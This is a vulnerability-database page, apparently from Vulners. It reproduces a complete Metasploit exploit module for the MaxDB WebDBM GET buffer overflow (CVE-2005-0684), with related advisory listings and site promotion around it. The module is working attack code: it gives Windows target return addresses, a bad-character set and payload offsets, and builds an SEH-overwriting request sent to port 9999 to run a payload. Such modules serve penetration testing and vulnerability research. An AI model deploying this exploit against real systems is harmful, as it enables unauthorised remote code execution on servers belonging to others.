Lucene search
K

MaxDB WebDBM GET Buffer Overflow

🗓️ 26 Dec 2005 14:34:22Reported by hdm <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 21 Views

MaxDB WebDBM GET Buffer Overflow exploit for Windows systems using stack buffer overflo

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2005-0684
9 May 201000:00
circl
Check Point Advisories
MySQL MaxDB Webtool GET Command Buffer Overflow (CVE-2005-0684)
1 Mar 201000:00
checkpoint_advisories
CVE
CVE-2005-0684
26 Apr 200504:00
cve
Cvelist
CVE-2005-0684
26 Apr 200504:00
cvelist
Exploit DB
MaxDB WebDBM - GET Buffer Overflow (Metasploit)
9 May 201000:00
exploitdb
NVD
CVE-2005-0684
25 Apr 200504:00
nvd
Packet Storm
MaxDB WebDBM GET Buffer Overflow
26 Nov 200900:00
packetstorm
Saint
MySQL MaxDB WebTools special character buffer overflow
22 Dec 200500:00
saint
Saint
MySQL MaxDB WebTools special character buffer overflow
22 Dec 200500:00
saint
Saint
MySQL MaxDB WebTools special character buffer overflow
22 Dec 200500:00
saint
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MaxDB WebDBM GET Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the MaxDB WebDBM
        service. This service is included with many recent versions
        of the MaxDB and SAPDB products. This particular module is
        capable of exploiting Windows systems through the use of an
        SEH frame overwrite. The offset to the SEH frame may change
        depending on where MaxDB has been installed, this module
        assumes a web root path with the same length as:

        C:\Program Files\sdb\programs\web\Documents
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2005-0684'],
          [ 'OSVDB', '15816'],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities'],
          [ 'BID', '13368'],
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 2052,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",
          'StackAdjustment' => -3500,
        },
        'Platform'   => 'win',
      'Targets'        =>
        [
          ['MaxDB 7.5.00.11 / 7.5.00.24', { 'Ret' => 0x1002aa19 }], # wapi.dll
          ['Windows 2000 English',        { 'Ret' => 0x75022ac4 }], # ws2help.dll
          ['Windows XP English SP0/SP1',  { 'Ret' => 0x71aa32ad }], # ws2help.dll
          ['Windows 2003 English',        { 'Ret' => 0x7ffc0638 }], # peb magic :-)
          ['Windows NT 4.0 SP4/SP5/SP6',  { 'Ret' => 0x77681799 }], # ws2help.dll
        ],
      'DisclosureDate' => '2005-04-26',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(9999)
      ])
  end

  def exploit
    # Trigger the SEH by writing past the end of the page after
    # the SEH is already overwritten. This avoids the other smashed
    # pointer exceptions and goes straight to the payload.
    buf = rand_text_alphanumeric(16384)
    buf[1586, payload.encoded.length] = payload.encoded
    buf[3638, 5] = "\xe9" + [-2052].pack('V')
    buf[3643, 2] = "\xeb\xf9"
    buf[3647, 4] = [target.ret].pack('V')

    print_status("Trying target address 0x%.8x..." % target.ret)

    send_request_raw({
      'uri' => '/%' + buf
    }, 5)

    handler
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.8High risk
Vulners AI Score7.8
CVSS 210
EPSS0.68504
21